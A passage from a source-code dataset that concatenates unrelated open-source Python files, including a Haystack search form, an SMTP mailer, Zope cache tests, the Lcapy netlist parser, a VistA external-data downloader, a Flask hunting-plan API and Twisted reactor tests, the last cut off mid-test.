| mit | -3,287,934,114,056,025,600 | 28.92437 | 84 | 0.596462 | false |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/share/pyshared/ubuntuone-client/ubuntuone/status/messaging.py | 1 | 1398 | # ubuntuone.status.messaging - Messages to the user
#
# Author: Eric Casteleijn <[email protected]>
#
# Copyright 2011 Canonical Ltd.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module that defines the interfaces for messaging the end user."""
from abc import ABCMeta, abstractmethod
APPLICATION_NAME = 'Ubuntu One Client'
class AbstractMessaging(object):
"""Abstract Base Class for notification implementations."""
__metaclass__ = ABCMeta
# pylint: disable=R0913
@abstractmethod
def show_message(self, sender, callback=None, message_time=None,
message_count=None, icon=None):
"""Show a message in the messaging menu."""
# pylint: enable=R0913
@abstractmethod
def update_count(self, sender, add_count):
"""Update the count for an existing indicator."""
| gpl-3.0 | -7,006,785,282,109,029,000 | 34.846154 | 75 | 0.726037 | false |
RENCI/xDCIShare | hs_core/discovery_form.py | 1 | 4927 | from haystack.forms import FacetedSearchForm
from haystack.query import SQ, SearchQuerySet
from crispy_forms.layout import *
from crispy_forms.bootstrap import *
from django import forms
class DiscoveryForm(FacetedSearchForm):
NElat = forms.CharField(widget = forms.HiddenInput(), required=False)
NElng = forms.CharField(widget = forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget = forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget = forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
def search(self):
if not self.cleaned_data.get('q'):
sqs = self.searchqueryset.filter(discoverable=True).filter(is_replaced_by=False)
else:
sqs = super(FacetedSearchForm, self).search().filter(discoverable=True).filter(is_replaced_by=False)
geo_sq = SQ()
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
geo_sq.add(SQ(coverage_north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(coverage_north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
if self.cleaned_data['start_date']:
sqs = sqs.filter(coverage_start_date__gte=self.cleaned_data['start_date'])
# Check to see if an end_date was chosen.
if self.cleaned_data['end_date']:
sqs = sqs.filter(coverage_end_date__lte=self.cleaned_data['end_date'])
author_sq = SQ()
subjects_sq = SQ()
resource_sq = SQ()
public_sq = SQ()
owner_sq = SQ()
discoverable_sq = SQ()
published_sq = SQ()
variable_sq = SQ()
sample_medium_sq = SQ()
units_name_sq = SQ()
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
if value:
if "creators" in field:
author_sq.add(SQ(creators=sqs.query.clean(value)), SQ.OR)
elif "subjects" in field:
subjects_sq.add(SQ(subjects=sqs.query.clean(value)), SQ.OR)
elif "resource_type" in field:
resource_sq.add(SQ(resource_type=sqs.query.clean(value)), SQ.OR)
elif "public" in field:
public_sq.add(SQ(public=sqs.query.clean(value)), SQ.OR)
elif "owners_names" in field:
owner_sq.add(SQ(owners_names=sqs.query.clean(value)), SQ.OR)
elif "discoverable" in field:
discoverable_sq.add(SQ(discoverable=sqs.query.clean(value)), SQ.OR)
elif "published" in field:
published_sq.add(SQ(published=sqs.query.clean(value)), SQ.OR)
elif 'variable_names' in field:
variable_sq.add(SQ(variable_names=sqs.query.clean(value)), SQ.OR)
elif 'sample_mediums' in field:
sample_medium_sq.add(SQ(sample_mediums=sqs.query.clean(value)), SQ.OR)
elif 'units_names' in field:
units_name_sq.add(SQ(units_names=sqs.query.clean(value)), SQ.OR)
else:
continue
if author_sq:
sqs = sqs.filter(author_sq)
if subjects_sq:
sqs = sqs.filter(subjects_sq)
if resource_sq:
sqs = sqs.filter(resource_sq)
if public_sq:
sqs = sqs.filter(public_sq)
if owner_sq:
sqs = sqs.filter(owner_sq)
if discoverable_sq:
sqs = sqs.filter(discoverable_sq)
if published_sq:
sqs = sqs.filter(published_sq)
if variable_sq:
sqs = sqs.filter(variable_sq)
if sample_medium_sq:
sqs = sqs.filter(sample_medium_sq)
if units_name_sq:
sqs = sqs.filter(units_name_sq)
return sqs | bsd-3-clause | -1,619,511,691,017,527,800 | 39.393443 | 112 | 0.574995 | false |
thinksabin/lazy-devops | S3 bucket Maker/Mailer.py | 1 | 1471 |
import datetime
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from smtplib import SMTP
class Mailer():
smtp_server = ''
smtp_username = ''
smtp_password = ''
smtp_port = '587'
from_add = "[email protected]"
def __init__(self, receiver, subject, body, filepath, filename):
self.receiver = receiver
self.subject = subject
self.body = body
self.filepath = filepath
self.filename = filename
self.msg = MIMEMultipart('alternative')
def attach_attachment(self):
part = MIMEApplication(open(self.filepath , "rb").read())
part.add_header('Content-Disposition', 'attachment', filename=filename)
self.msg.attach(part)
def send_mail(self):
self.msg['Subject'] = "Your S3 Details"
self.msg['From'] = self.from_add
self.msg['To'] = self.receiver
# text = "Please find the attachment for the s3 bucket details"
part1 = MIMEText(self.body, 'plain')
self.msg.attach(part1)
mail = smtplib.SMTP(host = self.smtp_server, port = self.smtp_port, timeout = 10)
mail.set_debuglevel(10)
mail.starttls()
mail.ehlo()
mail.login(self.smtp_username,self.smtp_password)
mail.sendmail(self.from_add, self.receiver, self.msg.as_string())
mail.quit()
| apache-2.0 | 7,089,824,654,200,791,000 | 29.020408 | 89 | 0.639701 | false |
ZeitOnline/zeit.connector | src/zeit/connector/tests/test_cache.py | 1 | 3342 | # coding: utf8
import BTrees
import StringIO
import ZODB
import os
import threading
import transaction
import zeit.connector.cache
import zeit.connector.testing
import zope.app.testing.functional
class TestResourceCache(zope.app.testing.functional.FunctionalTestCase):
layer = zeit.connector.testing.zope_connector_layer
def setUp(self):
super(TestResourceCache, self).setUp()
self.cache = zeit.connector.cache.ResourceCache()
self.getRootFolder()['cache'] = self.cache
self.properties1 = {('getetag', 'DAV:'): 'etag1'}
self.properties2 = {('getetag', 'DAV:'): 'etag2'}
self.uniqueId = u'föö'
self.key = zeit.connector.cache.get_storage_key(self.uniqueId)
self.BUFFER_SIZE = zeit.connector.cache.Body.BUFFER_SIZE
def test_etag_migration(self):
self.cache._etags = BTrees.family64.OO.BTree()
self.cache._etags[self.key] = 'etag1'
data = zeit.connector.cache.SlottedStringRef('data')
self.cache._data[self.key] = data
self.assertEquals(
'data',
self.cache.getData(self.uniqueId, self.properties1).read())
del self.cache._etags[self.key]
self.assertRaises(
KeyError, self.cache.getData, self.uniqueId, self.properties1)
del self.cache._etags
self.assertRaises(
KeyError, self.cache.getData, self.uniqueId, self.properties1)
def test_missing_blob_file(self):
data1 = StringIO.StringIO(self.BUFFER_SIZE* 2 * 'x')
data2 = StringIO.StringIO(self.BUFFER_SIZE* 2 * 'y')
self.cache.setData(self.uniqueId, self.properties1, data1)
transaction.commit()
body = self.cache._data[self.key]
os.remove(body.data.committed())
del body.data._p_changed # Invalidate, thus force reload
self.assertRaises(KeyError,
self.cache.getData, self.uniqueId, self.properties1)
self.cache.setData(self.uniqueId, self.properties2, data2)
self.assertEquals(
data2.getvalue(),
self.cache.getData(self.uniqueId, self.properties2).read())
def test_missing_blob_file_with_legacy_data(self):
data = ZODB.blob.Blob()
data.open('w').write('ablob')
self.cache._data[self.key] = data
self.cache._etags = BTrees.family64.OO.BTree()
self.cache._etags[self.key] = 'etag1'
transaction.commit()
os.remove(data.committed())
del data._p_changed
self.assertRaises(KeyError,
self.cache.getData, self.uniqueId, self.properties1)
data2 = StringIO.StringIO(self.BUFFER_SIZE * 2 * 'y')
self.cache.setData(self.uniqueId, self.properties2, data2)
self.assertEquals(
data2.getvalue(),
self.cache.getData(self.uniqueId, self.properties2).read())
def test_blob_conflict_resolution(self):
size = zeit.connector.cache.Body.BUFFER_SIZE
body = StringIO.StringIO('body' * size)
def store():
transaction.abort()
self.cache.setData(self.uniqueId, self.properties1, body)
transaction.commit()
t1 = threading.Thread(target=store)
t2 = threading.Thread(target=store)
t1.start()
t2.start()
t1.join()
t2.join()
| bsd-3-clause | -8,179,706,775,883,581,000 | 37.390805 | 78 | 0.631437 | false |
mph-/lcapy | lcapy/parser.py | 1 | 8849 | """This module performs parsing of SPICE-like netlists. It uses a
custom parser rather than lex/yacc to give better error messages.
Copyright 2015--2020 Michael Hayes, UCECE
"""
import re
# Could use a script to generate parser and parsing tables if speed
# was important.
def split(s, delimiters):
"""Split string by specified delimiters but not if a delimiter is
within curly brackets {} or ""."""
parts = []
current = []
close_bracket = ''
bracket_stack = []
for c in (s + delimiters[0]):
if c in delimiters and len(bracket_stack) == 0:
if len(current) > 0:
parts.append(''.join(current))
current = []
else:
if c == close_bracket:
close_bracket = bracket_stack.pop()
elif c == '{':
bracket_stack.append(close_bracket)
close_bracket = '}'
elif c == '"':
bracket_stack.append(close_bracket)
close_bracket = '"'
current.append(c)
if close_bracket != '':
raise ValueError('Missing %s in %s' % (close_bracket, s))
return parts
class Param(object):
def __init__(self, name, base, comment):
self.name = name
self.base = base
self.comment = comment
self.baseclass = None
def is_valid(self, string):
if self.baseclass is None:
return True
return self.baseclass.is_valid(string)
class Rule(object):
def __init__(self, cpt_type, classname, params, comment, pos):
self.type = cpt_type
self.classname = classname
self.params = params
self.comment = comment
self.pos = pos
def __repr__(self):
return self.type + 'name ' + ' '.join(self.params)
def syntax_error(self, error, string):
raise ValueError('Syntax error: %s when parsing %s\nExpected format: %s' % (error, string, repr(self)))
def process(self, paramdict, string, fields, name, namespace):
params = self.params
if len(fields) > len(params):
extra = ''
if '(' in string:
extra = ' (perhaps enclose expressions with parentheses in {})'
self.syntax_error('Too many args' + extra, string)
nodes = []
args = []
for m, param in enumerate(params):
if m >= len(fields):
# Optional argument
if param[0] == '[':
break
self.syntax_error('Missing arg %s' % param, string)
if param[0] == '[':
param = param[1:-1]
field = fields[m]
if paramdict[param].base in ('pin', 'node'):
if field[0] == '.':
# Note, name contains namespace
field = name + field
else:
field = namespace + field
nodes.append(field)
elif paramdict[param].base != 'keyword':
args.append(field)
return tuple(nodes), args
class Parser(object):
def __init__(self, cpts, grammar, allow_anon=False):
"""cpts is a module containing a class for each component
grammar is a module defining the syntax of a netlist"""
# A string defining the syntax for a netlist
rules = grammar.rules
# A string defining parameters
params = grammar.params
# A string defining delimiter characters
self.delimiters = grammar.delimiters
# A string defining comment characters
self.comments = grammar.comments
self.allow_anon = allow_anon
self.cpts = cpts
self.paramdict = {}
self.ruledict = {}
for param in params.split('\n'):
self._add_param(param)
for rule in rules.split('\n'):
self._add_rule(rule)
cpts = sorted(self.ruledict.keys(), key=len, reverse=True)
# The symbol name must be a valid Sympy symbol name so
# it cannot include symbols such as + and -.
self.cpt_pattern = re.compile("(%s)([#_\w'?]+)?" % '|'.join(cpts))
def _add_param(self, string):
if string == '':
return
fields = string.split(':')
paramname = fields[0]
fields = fields[1].split(';', 1)
parambase = fields[0].strip()
comment = fields[1].strip()
self.paramdict[paramname] = Param(paramname, parambase, comment)
def _add_rule(self, string):
if string == '':
return
fields = string.split(':')
cpt_classname = fields[0]
fields = fields[1].split(';', 1)
string = fields[0].strip()
comment = fields[1].strip()
fields = string.split(' ')
params = fields[1:]
# Skip the name part in the rule, e.g., only consider D from Dname.
cpt_type = fields[0][0:-4]
pos = None
for m, param in enumerate(params):
if param[0] == '[':
param = param[1:-1]
if param not in self.paramdict:
raise ValueError('Unknown parameter %s for %s' % (param, string))
if pos is None and self.paramdict[param].base == 'keyword':
pos = m
if cpt_type not in self.ruledict:
self.ruledict[cpt_type] = ()
self.ruledict[cpt_type] += (Rule(cpt_type, cpt_classname,
params, comment, pos), )
def parse(self, string, namespace='', parent=None):
"""Parse string and create object"""
directive = False
net = string.strip()
if net == '':
directive = True
elif net[0] in self.comments:
directive = True
elif net[0] == ';':
directive = True
elif net[0] == '.':
directive = True
if directive:
cpt_type = 'XX'
cpt_id = ''
name = 'XX'
name += parent._make_anon(cpt_type)
defname = namespace + cpt_type + cpt_id
if string.startswith(';') and not string.startswith(';;'):
opts_string = string[1:]
else:
opts_string = ''
return self.cpts.make('XX', parent, '', defname, name,
cpt_type, cpt_id, string, opts_string, (), '')
net = namespace + net
parts = net.split(';', 1)
fields = split(parts[0], self.delimiters)
# Strip {} and "".
for m, field in enumerate(fields):
if field[0] in '{"':
fields[m] = fields[m][1:-1]
name = fields.pop(0)
parts = name.split('.')
namespace = ''
if len(parts) > 1:
namespace = '.'.join(parts[0:-1]) + '.'
name = parts[-1]
match = self.cpt_pattern.match(name)
if match is None:
raise ValueError('Unknown component %s while parsing "%s"' % (name, net))
groups = match.groups()
cpt_type, cpt_id = groups[0], groups[1]
if cpt_id is None:
cpt_id = ''
# This is the most hackery aspect of this parser where we
# choose the rule pattern based on a keyword. If the
# keyword is not present, default to first rule pattern.
# Perhaps a factory should sort this out?
rule = self.ruledict[cpt_type][0]
keyword = ''
for rule1 in self.ruledict[cpt_type]:
pos = rule1.pos
if pos is None:
continue
if len(fields) > pos and fields[pos].lower() == rule1.params[pos]:
rule = rule1
keyword = rule1.params[pos]
break
defname = namespace + cpt_type + cpt_id
name = defname
if (cpt_id == '' and parent is not None
and (cpt_type in ('A', 'W', 'O', 'P')) or self.allow_anon):
name += parent._make_anon(cpt_type)
elif cpt_id == '?':
# Automatically name cpts to ensure they are unique
name = name[:-1] + parent._make_anon(cpt_type)
nodes, args = rule.process(self.paramdict, net, fields, name,
namespace)
parts = net.split(';', 1)
opts_string = parts[1].strip() if len(parts) > 1 else ''
keyword = (pos, keyword)
# self.cpts is either the mnacpts or schematic module
return self.cpts.make(rule.classname, parent, namespace,
defname, name, cpt_type, cpt_id, net,
opts_string, tuple(nodes), keyword,
*args)
| lgpl-2.1 | 5,817,020,142,593,945,000 | 30.716846 | 119 | 0.508984 | false |
OSEHRA/VistA | Scripts/ExternalDownloader.py | 1 | 4599 | #---------------------------------------------------------------------------
# Copyright 2013-2019 The Open Source Electronic Health Record Alliance
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#---------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import object
import sys
import os
import urllib.request, urllib.parse, urllib.error
from LoggerManager import logger, initConsoleLogging
from ConvertToExternalData import generateExternalDataFileName
from ConvertToExternalData import generateSha1Sum
"""
Download External Data
"""
DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL = "https://code.worldvista.org/content/SHA1"
""" find or download the external KIDS Build file, return the file path """
def obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir):
assert cacheDir and os.path.exists(cacheDir)
rootDir = os.path.dirname(filePath)
externalFileName = generateExternalDataFileName(sha1Sum)
externalFile = os.path.join(rootDir, externalFileName)
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" try to find the file in the cache dir """
externalFile = os.path.join(cacheDir, externalFileName.replace('_','/'))
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" make sure cacheDir has the right layout """
rootDir = os.path.dirname(externalFile)
if not os.path.exists(rootDir):
os.makedirs(rootDir)
""" download from remote """
extDownloader = ExternalDataDownloader()
logger.info("Downloading from remote link")
result = extDownloader.downloadExternalDataByHash(sha1Sum, externalFile)
if not result:
logger.error("Downloading from remote failed")
if os.path.exists(externalFile):
os.remove(externalFile)
externalFile = None
logger.info("%s, %s" % (result, externalFile))
return (result, externalFile)
class ExternalDataDownloader(object):
def __init__(self, siteUrl=DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL):
self._siteUrl = siteUrl
"""
"""
@staticmethod
def downloadExternalDataDirectly(dwnUrl, fileToSave):
try:
urllib.request.urlretrieve(dwnUrl, fileToSave)
return True
except Exception as ex:
logger.error(ex)
return False
"""
"""
def downloadExternalDataByHash(self, sha1Sum, fileToSave):
dwnUrl = "%s/%s" % (self._siteUrl, sha1Sum)
if not self.downloadExternalDataDirectly(dwnUrl, fileToSave):
return False
""" verify the sha1sum of downloaded file """
sha1SumDwn = generateSha1Sum(fileToSave)
if sha1Sum == sha1SumDwn:
return True
logger.error("sha1Sum mismatch %s:%s" % (sha1Sum, sha1SumDwn))
os.remove(fileToSave)
def main():
initConsoleLogging()
# testing the PatchFileBySha1
logger.info(sys.argv)
PatchFileBySha1(sys.argv[1], sys.argv[2], sys.argv[3])
def downloadAllKIDSSha1File(topDir, cacheDir):
from ConvertToExternalData import isValidKIDSBuildSha1Suffix
from ConvertToExternalData import readSha1SumFromSha1File
import shutil
initConsoleLogging()
absCurDir = os.path.abspath(topDir)
for (root, dirs, files) in os.walk(absCurDir):
for f in files:
if not isValidKIDSBuildSha1Suffix(f):
continue
filePath = os.path.join(root, f)
sha1Sum = readSha1SumFromSha1File(filePath)
result, extFilePath = obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir)
if result:
destFile = filePath[:filePath.rfind('.')]
if os.path.exists(destFile) and generateSha1Sum(destFile) == sha1Sum:
logger.info("%s is already current" % destFile)
continue
logger.info("%s => %s" % (extFilePath, destFile))
shutil.copyfile(extFilePath, destFile)
if __name__ == '__main__':
#main()
downloadAllKIDSSha1File(sys.argv[1], sys.argv[2])
| apache-2.0 | 1,417,033,469,209,968,000 | 36.08871 | 82 | 0.702979 | false |
PnCevennes/SaisieChasse | modules/chasse/routes.py | 1 | 2687 | #coding: utf8
from flask import Blueprint, request
import json
from sqlalchemy import select
from server import db
from .models import VLieuTirSynonymes, PlanChasse, SaisonChasse
from ..utils.utilssqlalchemy import json_resp
ltroutes = Blueprint('lieux_tir', __name__)
@ltroutes.route('/', methods=['GET'])
@ltroutes.route('/<int:id>', methods=['GET'])
@json_resp
def get_lieutirsyn(id = None):
q = db.session.query(VLieuTirSynonymes)
if request.args.get('code_com') :
print 'code_com', request.args.get('code_com')
q = q.filter_by(code_com = request.args.get('code_com'))
if id:
q = q.filter_by(id=id)
data = q.all()
return [attribut.as_dict() for attribut in data]
@ltroutes.route('/communes', methods=['GET'])
@json_resp
def get_communes():
data = db.session \
.query(VLieuTirSynonymes.nom_com, VLieuTirSynonymes.code_com) \
.distinct(VLieuTirSynonymes.nom_com).all()
return [{"value" : attribut.nom_com, "id" : int(attribut.code_com) } for attribut in data]
pcroutes = Blueprint('plan_chasse', __name__)
@pcroutes.route('/bracelet/<int:id>', methods=['GET'])
@json_resp
def get_bracelet_detail(id = None):
data = db.session.query(PlanChasse).filter_by(id=id).first()
return data.as_dict()
@pcroutes.route('/bracelet/<int:id>', methods=['POST', 'PUT'])
def insertupdate_bracelet_detail(id = None):
data = json.loads(request.data)
o = PlanChasse(**data)
db.session.merge(o)
try:
db.session.commit()
return json.dumps({'success':True, 'message':'Enregistrement sauvegardé avec success'}), 200, {'ContentType':'application/json'}
except Exception as e:
db.session.rollback()
return json.dumps({'success':False, 'message':'Impossible de sauvegarder l\'enregistrement'}), 500, {'ContentType':'application/json'}
@pcroutes.route('/auteurs', methods=['GET'])
@json_resp
def get_auteurs():
s1 = select([PlanChasse.auteur_tir]).distinct()
s2 = select([PlanChasse.auteur_constat]).distinct()
q = s1.union(s2).alias('auteurs')
data = db.session.query(q).all()
return [{"auteur_tir" : a }for a in data]
@pcroutes.route('/saison', methods=['GET'])
@json_resp
def get_saison_list():
data = db.session.query(SaisonChasse).all()
return [a.as_dict() for a in data]
@pcroutes.route('/bracelets_list/<int:saison>', methods=['GET'])
@json_resp
def get_bracelet_list(saison = None):
data = db.session \
.query(PlanChasse.id, PlanChasse.no_bracelet) \
.filter_by(fk_saison = saison)\
.distinct().all()
return [{"no_bracelet" : attribut.no_bracelet, "id" : int(attribut.id) } for attribut in data]
| gpl-3.0 | 5,255,791,992,090,212,000 | 31.361446 | 142 | 0.661579 | false |
yehudagale/fuzzyJoiner | old/matcher.py | 1 | 1840 | #using tutorial https://suhas.org/sqlalchemy-tutorial/
from sys import argv
from matcher_functions import *
#establish connection to database
con, meta = connect(argv[1], argv[2], argv[3])
#load pairs from database
aliases = get_aliases(con, meta)
#create dictionaries assingning serial numbers to names and names from serial numbers
num_to_word, word_to_num = create_double_num_dicts(aliases)
#load the buckets from the database bucket_list is aranges as follows:
#bucket_list[pair_of_buckets][bucket(this must be 0 or 1)][name (this represents a single name)][0 for number and 1 for pre-procced name]
bucket_list, bucket_words = load_good_buckets('wordtable1', 'wordtable2', word_to_num, con, meta)
#print out the number of names that are possible to get just based on bucketing:
impossible = get_impossible(aliases, bucket_list, num_to_word)
print("possible matches: " + str(len(aliases) - len(impossible)))
#next make a list to store the outcomes of all our tests:
matches_list = []
#then run our tests
matches_list.append(run_test(lambda x : x.replace(" ", ""), lambda name1, name2 : name1 in name2 or name2 in name1, num_to_word, bucket_list))
matches_list.append(run_test(lambda x : set(x.split()), lambda name1, name2 : name1.issubset(name2) or name2.issubset(name1), num_to_word, bucket_list))
matches_list.append(run_special_test(bucket_list, num_to_word))
#next create a test dictionary relating each item in the first set to k items in other set
test_dict = make_test_dict(set([]).union(*matches_list), 1000)
#use this dictionary to calculate and print the f-score
print("fscore: " + str(fscore(aliases, test_dict, 1)))
#next export the items we missed
export_missed(aliases, test_dict, con, meta)
#lastly export the items we could not have gotten since they were not in the same bucket:
export_unbucketed(impossible, con, meta) | epl-1.0 | 5,213,486,929,230,568,000 | 62.482759 | 152 | 0.756522 | false |
chiffa/PolyPharma | bioflow/db_importers/hint_importer.py | 2 | 1976 | """
Set of tools to work with HiNT database
"""
from bioflow.bio_db_parsers.proteinRelParsers import parse_hint
from bioflow.configs.main_configs import hint_csv_path
from bioflow.neo4j_db.GraphDeclarator import DatabaseGraph
from bioflow.utils.log_behavior import get_logger
log = get_logger(__name__)
def get_uniprots_for_hint():
"""
Recovers UP Gene names maps to UNIPROT nodes containing them.
:return:
"""
initial_dict = {}
for node in DatabaseGraph.get_all('UNIPROT'):
initial_dict[node['legacyID']] = node.id
for key in list(initial_dict.keys()):
initial_dict[key.split('_')[0]] = initial_dict.pop(key)
return initial_dict
def cross_ref_hint():
"""
Pulls Hint relationships and connects deprecated_reached_uniprots_neo4j_id_list in the database
:return:
"""
relations_dict = parse_hint(hint_csv_path)
uniprot_ref_dict = get_uniprots_for_hint()
processed_nodes = set()
actual_cross_links = 0
breakpoints = 300
size = len(relations_dict)
log.info('Starting inserting HINT for %s primary nodes' % size)
for i, (legacyId, linked_legacyIds) in enumerate(relations_dict.items()):
if i % breakpoints:
# TODO: [progress bar]
log.info('\t %.2f %%' % (float(i) / float(size) * 100))
if legacyId in list(uniprot_ref_dict.keys()):
for linked_legacyId in linked_legacyIds:
if linked_legacyId in list(uniprot_ref_dict.keys()):
actual_cross_links += 1
DatabaseGraph.link(uniprot_ref_dict[legacyId], uniprot_ref_dict[linked_legacyId],
'is_interacting',
{'source': 'HINT',
'parse_type': 'physical_entity_molecular_interaction'})
log.info('HINT Cross-links: %s, HINT processed nodes: %s',
actual_cross_links, len(processed_nodes))
| bsd-3-clause | 8,683,032,263,872,799,000 | 30.870968 | 101 | 0.610324 | false |
biddisco/VTK | ThirdParty/Twisted/twisted/internet/test/test_posixbase.py | 2 | 9701 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.internet.posixbase} and supporting code.
"""
from __future__ import division, absolute_import
from twisted.python.compat import set, _PY3
from twisted.trial.unittest import TestCase
from twisted.internet.defer import Deferred
from twisted.internet.posixbase import PosixReactorBase, _Waker
from twisted.internet.protocol import ServerFactory
skipSockets = None
if _PY3:
skipSockets = "Re-enable when Python 3 port supports AF_UNIX"
else:
try:
from twisted.internet import unix
from twisted.test.test_unix import ClientProto
except ImportError:
skipSockets = "Platform does not support AF_UNIX sockets"
from twisted.internet.tcp import Port
from twisted.internet import reactor
class TrivialReactor(PosixReactorBase):
def __init__(self):
self._readers = {}
self._writers = {}
PosixReactorBase.__init__(self)
def addReader(self, reader):
self._readers[reader] = True
def removeReader(self, reader):
del self._readers[reader]
def addWriter(self, writer):
self._writers[writer] = True
def removeWriter(self, writer):
del self._writers[writer]
class PosixReactorBaseTests(TestCase):
"""
Tests for L{PosixReactorBase}.
"""
def _checkWaker(self, reactor):
self.assertIsInstance(reactor.waker, _Waker)
self.assertIn(reactor.waker, reactor._internalReaders)
self.assertIn(reactor.waker, reactor._readers)
def test_wakerIsInternalReader(self):
"""
When L{PosixReactorBase} is instantiated, it creates a waker and adds
it to its internal readers set.
"""
reactor = TrivialReactor()
self._checkWaker(reactor)
def test_removeAllSkipsInternalReaders(self):
"""
Any L{IReadDescriptors} in L{PosixReactorBase._internalReaders} are
left alone by L{PosixReactorBase._removeAll}.
"""
reactor = TrivialReactor()
extra = object()
reactor._internalReaders.add(extra)
reactor.addReader(extra)
reactor._removeAll(reactor._readers, reactor._writers)
self._checkWaker(reactor)
self.assertIn(extra, reactor._internalReaders)
self.assertIn(extra, reactor._readers)
def test_removeAllReturnsRemovedDescriptors(self):
"""
L{PosixReactorBase._removeAll} returns a list of removed
L{IReadDescriptor} and L{IWriteDescriptor} objects.
"""
reactor = TrivialReactor()
reader = object()
writer = object()
reactor.addReader(reader)
reactor.addWriter(writer)
removed = reactor._removeAll(
reactor._readers, reactor._writers)
self.assertEqual(set(removed), set([reader, writer]))
self.assertNotIn(reader, reactor._readers)
self.assertNotIn(writer, reactor._writers)
class TCPPortTests(TestCase):
"""
Tests for L{twisted.internet.tcp.Port}.
"""
if not isinstance(reactor, PosixReactorBase):
skip = "Non-posixbase reactor"
def test_connectionLostFailed(self):
"""
L{Port.stopListening} returns a L{Deferred} which errbacks if
L{Port.connectionLost} raises an exception.
"""
port = Port(12345, ServerFactory())
port.connected = True
port.connectionLost = lambda reason: 1 // 0
return self.assertFailure(port.stopListening(), ZeroDivisionError)
class TimeoutReportReactor(PosixReactorBase):
"""
A reactor which is just barely runnable and which cannot monitor any
readers or writers, and which fires a L{Deferred} with the timeout
passed to its C{doIteration} method as soon as that method is invoked.
"""
def __init__(self):
PosixReactorBase.__init__(self)
self.iterationTimeout = Deferred()
self.now = 100
def addReader(self, reader):
"""
Ignore the reader. This is necessary because the waker will be
added. However, we won't actually monitor it for any events.
"""
def removeAll(self):
"""
There are no readers or writers, so there is nothing to remove.
This will be called when the reactor stops, though, so it must be
implemented.
"""
return []
def seconds(self):
"""
Override the real clock with a deterministic one that can be easily
controlled in a unit test.
"""
return self.now
def doIteration(self, timeout):
d = self.iterationTimeout
if d is not None:
self.iterationTimeout = None
d.callback(timeout)
class IterationTimeoutTests(TestCase):
"""
Tests for the timeout argument L{PosixReactorBase.run} calls
L{PosixReactorBase.doIteration} with in the presence of various delayed
calls.
"""
def _checkIterationTimeout(self, reactor):
timeout = []
reactor.iterationTimeout.addCallback(timeout.append)
reactor.iterationTimeout.addCallback(lambda ignored: reactor.stop())
reactor.run()
return timeout[0]
def test_noCalls(self):
"""
If there are no delayed calls, C{doIteration} is called with a
timeout of C{None}.
"""
reactor = TimeoutReportReactor()
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, None)
def test_delayedCall(self):
"""
If there is a delayed call, C{doIteration} is called with a timeout
which is the difference between the current time and the time at
which that call is to run.
"""
reactor = TimeoutReportReactor()
reactor.callLater(100, lambda: None)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 100)
def test_timePasses(self):
"""
If a delayed call is scheduled and then some time passes, the
timeout passed to C{doIteration} is reduced by the amount of time
which passed.
"""
reactor = TimeoutReportReactor()
reactor.callLater(100, lambda: None)
reactor.now += 25
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 75)
def test_multipleDelayedCalls(self):
"""
If there are several delayed calls, C{doIteration} is called with a
timeout which is the difference between the current time and the
time at which the earlier of the two calls is to run.
"""
reactor = TimeoutReportReactor()
reactor.callLater(50, lambda: None)
reactor.callLater(10, lambda: None)
reactor.callLater(100, lambda: None)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 10)
def test_resetDelayedCall(self):
"""
If a delayed call is reset, the timeout passed to C{doIteration} is
based on the interval between the time when reset is called and the
new delay of the call.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
reactor.now += 25
